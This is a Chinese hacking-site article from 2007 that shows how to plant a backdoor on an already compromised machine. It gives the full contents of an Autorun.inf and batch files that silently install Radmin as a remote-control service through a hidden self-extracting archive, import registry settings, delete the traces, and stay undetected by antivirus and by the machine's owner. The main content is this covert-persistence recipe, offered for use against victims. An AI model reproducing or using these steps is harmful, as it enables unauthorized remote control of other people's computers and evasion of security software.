IP:3.141.25.125 Time:
加载中...
本站首页在线新闻技术文献软件工具国际版

-------- Welcome To Senqice Network  !Thank You For Your Support !--------
文献分类
·网站建设
·系统使用

文献TOP10
·DLL木马进程内幕大揭密
·ASP判断浏览器是移动端和PC端
·批处理教程
·常用DOS命令
·VBScript教程(三)
·Win10 隐藏硬盘上面额外的6个文件夹+3D 对象
·VBScript教程(二)
·VBS编程教程(六)终
·计算机网络基本概念(2)
·QQ被盗,好友不丢。

站内搜索






  本站的大部分软件工具和相关文献都来自网上收集,其版权归作者本人所有,如果有任何侵犯您权益的地方,请联系我,我将马上进行整理,谢谢。

入侵网站后全自动安装后门
圣骑士--网络安全技术中心 http://www.senqice.net/
所属分类:网站建设 作者:Mark Senqice 更新日期:2007-3-27
这里只需要你有上传的权限。 一共三个文件:1.Autorun.inf、2.Shell.bat、3.Hao.exe(自解压文件)。 思路: 全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件,第一文件带动运行第二文件,同时第二运行第三运行完可正常进入C盘。不会让人发觉。并且里面所带的批处理,会在最后把所有文件删除。此时,后门却已经装上去了(此法针对没有权限运行木马的入侵活动)。 制作: [autorun] open=shell.bat,这个是autorun.inf @echo off hao.exe c:\windows\explorer c:\ del autorun.inf del rad.exe del shell.ba,这个是shell.bat hao.exe,里面包含admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五个文件(关键所在)r.bat——批处理做法 @echo off @pchealthy.exe /install /silence @regedit /s admin.reg @net start r_server @del admin.reg @del r.bat,其他四个就是Radmin的文件。这个大家都会,复制过来就行。 我们再来看自解压的处理。在解压路径里我们用 %systemroot%\system32,就是解压到系统目录里,并且“解压后运行”填上我们的r.bat文件。因为这里的文件比较多,比较隐蔽。解压模式我们选 “全部隐藏”,和 “覆盖所有文件”! 好了,一个不被杀毒软件所能查杀的好后门程序就成功制作出来了! 大家不要放在文件夹里压缩哦,要直接选上admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五个文件压缩,这样就行啦。
查看人数:1302

设为首页收藏本站广告合作联系我们友情链接
本站页面刷新量: 4712499 人次 ┋ 最高峰: 2009-3-10 22:05:47 7897人在线 现有 45人在线 [网站于 2006-4-1 0:0:0开放统计]
〓圣骑士--网络安全技术中心〓 [Ver 6.1.0]
Copyright © 2004-2024 www.senqice.net All Rights Reserved 
Powered By :Senzx Net
备案序号:冀ICP备06013166号